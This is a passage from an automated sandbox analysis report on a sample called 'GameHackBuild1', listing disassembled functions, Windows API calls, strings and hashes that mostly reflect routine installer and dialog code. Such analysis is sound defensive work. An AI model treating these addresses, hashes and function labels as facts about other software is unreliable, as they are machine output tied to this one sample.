                                      • Instruction Fuzzy Hash: F7210A36E241664FCB48CF6DECD08377765AB86311746812BFA428B2D0C535ED26DBA0
                                      Function 00A0DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00A0DABE
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                        • Part of subcall function 00A11596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00A40EE8,?,00A0D202,00000000,?,00000050,00A40EE8), ref: 00A115B3
                                      • _strlen.LIBCMT ref: 00A0DADF
                                      • SetDlgItemTextW.USER32(?,00A3E154,?), ref: 00A0DB3F
                                      • GetWindowRect.USER32(?,?), ref: 00A0DB79
                                      • GetClientRect.USER32(?,?), ref: 00A0DB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00A0DC25
                                      • GetWindowRect.USER32(?,?), ref: 00A0DC52
                                      • SetWindowTextW.USER32(?,?), ref: 00A0DC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00A0DC9D
                                      • GetWindow.USER32(?,00000005), ref: 00A0DCA8
                                      • GetWindowRect.USER32(00000000,?), ref: 00A0DCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00A0DD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 2407758923-2512411981
                                      • Opcode ID: 43705c993219f8a1d06375fd33c255f3e554a9465cd55914c35c5c5e79dccd9a
                                      • Instruction ID: eba40b5100d266c196db799865bdc3cc1b30755e73cdc0a9074325536e3d2189
                                      • Opcode Fuzzy Hash: 43705c993219f8a1d06375fd33c255f3e554a9465cd55914c35c5c5e79dccd9a
                                      • Instruction Fuzzy Hash: FE819172508345AFD710DFA8DD89F6BBBF9EB89704F04091DFA84A3290D670E906CB52
                                      Function 00A2C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00A2C277
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE2F
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE41
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE53
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE65
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE77
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE89
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BE9B
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEAD
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEBF
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BED1
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEE3
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BEF5
                                        • Part of subcall function 00A2BE12: _free.LIBCMT ref: 00A2BF07
                                      • _free.LIBCMT ref: 00A2C26C
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A2C28E
                                      • _free.LIBCMT ref: 00A2C2A3
                                      • _free.LIBCMT ref: 00A2C2AE
                                      • _free.LIBCMT ref: 00A2C2D0
                                      • _free.LIBCMT ref: 00A2C2E3
                                      • _free.LIBCMT ref: 00A2C2F1
                                      • _free.LIBCMT ref: 00A2C2FC
                                      • _free.LIBCMT ref: 00A2C334
                                      • _free.LIBCMT ref: 00A2C33B
                                      • _free.LIBCMT ref: 00A2C358
                                      • _free.LIBCMT ref: 00A2C370
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: b41ef52bdeb38c7b58cbd39b1bfd212cab961d822f58dd0344c344488574caa8
                                      • Instruction ID: afea6800d5b3144653bf61dfc332fa38cd4c0b9f2a736340158866530cef1133
                                      • Opcode Fuzzy Hash: b41ef52bdeb38c7b58cbd39b1bfd212cab961d822f58dd0344c344488574caa8
                                      • Instruction Fuzzy Hash: 06315C326002259FEB20AB7CEA45B9AB3E9BF00320F148879F449DB951DF35EC408B60
                                      Function 00A1CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00A1CD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00A1CD7D
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00A1CD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00A1CDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00A1CDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00A1CDED
                                      • DeleteObject.GDI32(00000000), ref: 00A1CDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00A1CDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: 7f9632f035723a06039396dbed21d76f4e1ef79e7fd6f2674f319b65fb1a57b8
                                      • Instruction ID: a67e901e5064a9f0e61ee5bae770ea5065999061c4fecb30fe84e6111766b8c4
                                      • Opcode Fuzzy Hash: 7f9632f035723a06039396dbed21d76f4e1ef79e7fd6f2674f319b65fb1a57b8
                                      • Instruction Fuzzy Hash: 97110A725847107BE631EBA0AC0AFDF766CFF55751F014520FA42A60D2CAA48D8787A5
                                      Function 00A28EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00A28EC5
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
                                        • Part of subcall function 00A284DE: GetLastError.KERNEL32(?,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?,?), ref: 00A28506
                                      • _free.LIBCMT ref: 00A28ED1
                                      • _free.LIBCMT ref: 00A28EDC
                                      • _free.LIBCMT ref: 00A28EE7
                                      • _free.LIBCMT ref: 00A28EF2
                                      • _free.LIBCMT ref: 00A28EFD
                                      • _free.LIBCMT ref: 00A28F08
                                      • _free.LIBCMT ref: 00A28F13
                                      • _free.LIBCMT ref: 00A28F1E
                                      • _free.LIBCMT ref: 00A28F2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: f02f305523842740d1773ce8c5ce248d5d6eafad7d278d32f11257950fc90ea1
                                      • Instruction ID: 3d40c14852f237b5ea911bafc1a5a7683984d5941de2ab226ae0cbc6dea4af66
                                      • Opcode Fuzzy Hash: f02f305523842740d1773ce8c5ce248d5d6eafad7d278d32f11257950fc90ea1
                                      • Instruction Fuzzy Hash: EA11A47650111DAFCB11FF58EA42CDA3BA5FF04350B5140E5BA088B62ADA35DA519B80
                                      Function 00A02162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: d0418f7fa75b96f1fe6d291a1165462be033516c277b468617ba84e133b5336f
                                      • Instruction ID: 500d4a6cc01301ec7a95f3d98eb57c62b5e8771ae91b682b3faf4cfabf0dca6b
                                      • Opcode Fuzzy Hash: d0418f7fa75b96f1fe6d291a1165462be033516c277b468617ba84e133b5336f
                                      • Instruction Fuzzy Hash: E8F14A716043485BDB25EF34A9A9BFE7799AFD4300F08057DF8858F2C3DA659848C7A2
                                      Function 00A1ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A0130B: GetDlgItem.USER32(00000000,00003021), ref: 00A0134F
                                        • Part of subcall function 00A0130B: SetWindowTextW.USER32(00000000,00A335B4), ref: 00A01365
                                      • EndDialog.USER32(?,00000001), ref: 00A1AD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00A1AD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00A1AD60
                                      • SetWindowTextW.USER32(?,?), ref: 00A1AD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00A1AD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00A1AD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00A1ADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: dd9261f9afbca114c9ea792c7e28b3a1d03836d9a18bb7b22da6718748296268
                                      • Instruction ID: 4fbbdf6c60a18a9e9a8cd1efa62973a99731beeaf24f13bafd2edec678813a0b
                                      • Opcode Fuzzy Hash: dd9261f9afbca114c9ea792c7e28b3a1d03836d9a18bb7b22da6718748296268
                                      • Instruction Fuzzy Hash: A721E132245604BBD221DFA1FD49FBB3A7CFB57B46F020014F605A24A0CAA2AD42D732
                                      Function 00A09443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00A09448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A0946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A0948A
                                        • Part of subcall function 00A117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00A0BB05,00000000,.exe,?,?,00000800,?,?,00A185DF,?), ref: 00A117C2
                                      • _swprintf.LIBCMT ref: 00A09526
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00A09595
                                      • MoveFileW.KERNEL32(?,?), ref: 00A095D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      • Opcode ID: 9570815035ceac5e767a9848948d759e13d0f454d9d95b69e15b0c9871ddee8b
                                      • Instruction ID: 34a3a269319df9d3c007a5bab5eb6bd85b7fa5682995d2ff09ee38780b58eb81
                                      • Opcode Fuzzy Hash: 9570815035ceac5e767a9848948d759e13d0f454d9d95b69e15b0c9871ddee8b
                                      • Instruction Fuzzy Hash: 1741407190025C66DF20EBA0ED85EEF737CAF55380F0444E5B649E3092EB759B89CB64
                                      Function 00A18E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00A18F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A18F59
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00A18F80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 4094277203-4209811716
                                      • Opcode ID: d25331793fdfbe5a17d319d29a9c837025694ad6494ff48bced17f201141ee39
                                      • Instruction ID: 269ade5a0a28211d76ace810fd59e4374e1a07b7596a0e3ab0b11c026daf892f
                                      • Opcode Fuzzy Hash: d25331793fdfbe5a17d319d29a9c837025694ad6494ff48bced17f201141ee39
                                      • Instruction Fuzzy Hash: 3B313B325083117FDB20AB74AC02FEF7769EF55760F140529F901961D1EF68DA8AC3A5
                                      Function 00A10A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00A10A9D
                                        • Part of subcall function 00A0ACF5: GetVersionExW.KERNEL32(?), ref: 00A0AD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00A10AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A10AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A10B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A10B3D
                                      • __aullrem.LIBCMT ref: 00A10BCB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 10cf66cd0ffadb48477ba73bb94512288a277aa47772aa6388aed2e523fa0b57
                                      • Instruction ID: e92de6340d259152e7267c516b1208a6766444f7c123d1fbd9f2f3ffba7403f3
                                      • Opcode Fuzzy Hash: 10cf66cd0ffadb48477ba73bb94512288a277aa47772aa6388aed2e523fa0b57
                                      • Instruction Fuzzy Hash: 714129B24083059FC714DFA5C8809ABF7F8FB88715F004A2EF59692650E779E589CB51
                                      Function 00A2EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00A2F5A2,?,00000000,?,00000000,00000000), ref: 00A2EE6F
                                      • __fassign.LIBCMT ref: 00A2EEEA
                                      • __fassign.LIBCMT ref: 00A2EF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00A2EF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00A2F5A2,00000000,?,?,?,?,?,?,?,?,?,00A2F5A2,?), ref: 00A2EF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00A2F5A2,00000000,?,?,?,?,?,?,?,?,?,00A2F5A2,?), ref: 00A2EF83
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: df412ea30a2c94b1bf4908197daa474b7563f67bb0497e092b36016c73c3cf3b
                                      • Instruction ID: 3e39b19d2343beefccd5aa951baf1fb7ad242511f98f369f5311aa6b41c5beab
                                      • Opcode Fuzzy Hash: df412ea30a2c94b1bf4908197daa474b7563f67bb0497e092b36016c73c3cf3b
                                      • Instruction Fuzzy Hash: 1951D571A00219AFCB10CFACED45AEEBBF9EF09300F14452AF955E7291E7709981CB60
                                      Function 00A1C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00A1C54A
                                      • _swprintf.LIBCMT ref: 00A1C57E
                                        • Part of subcall function 00A0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A0401D
                                      • SetDlgItemTextW.USER32(?,00000066,00A4946A), ref: 00A1C59E
                                      • _wcschr.LIBVCRUNTIME ref: 00A1C5D1
                                      • EndDialog.USER32(?,00000001), ref: 00A1C6B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      • Opcode ID: be600fc557b7e2fc8a5736be83ecb026f16fa0c929c1e5776de3cebd378e6907
                                      • Instruction ID: ce064db6ca4b0eac2cae1190e9f2d3e92de27017327c976a61f534cf0725a663
                                      • Opcode Fuzzy Hash: be600fc557b7e2fc8a5736be83ecb026f16fa0c929c1e5776de3cebd378e6907
                                      • Instruction Fuzzy Hash: 3641CFB5D4061CBADB26DBA0DC45FEA7BBDEF48311F0040A2E509E60A0E7759BC4CB50
                                      Function 00A19635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00A1964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00A19693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00A1972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00A19732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00A19748
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1299550841.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                      • Associated: 00000000.00000002.1299527716.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299593068.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299624613.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1299819872.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a00000_GameHackBuild1.jbxd
                                      Similarity
                                      • API ID: Window$Show$RectText
                                      • String ID: RarHtmlClassName
                                      • API String ID: 3937224194-1658105358
                                      • Opcode ID: 28f36b15296152dc4a42b9c9cab4c2cf1e505b15b83c30492b84ff61373fae9d
                                      • Instruction ID: 054c89b3e53163996d20bfef9c27b87552e66b2bb3b314b7a41444a5c4374aa2
                                      • Opcode Fuzzy Hash: 28f36b15296152dc4a42b9c9cab4c2cf1e505b15b83c30492b84ff61373fae9d
                                      • Instruction Fuzzy Hash: BA31E331008310EFDB119FA4DC4CBABBBB8EF49701F004669FE499A1A2CB74D995CB61
                                      Function 00A2BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A2BF79: _free.LIBCMT ref: 00A2BFA2
                                      • _free.LIBCMT ref: 00A2C003
                                        • Part of subcall function 00A284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A2BFA7,?,00000000,?,00000000,?,00A2BFCE,?,00000007,?,?,00A2C3CB,?), ref: 00A284F4
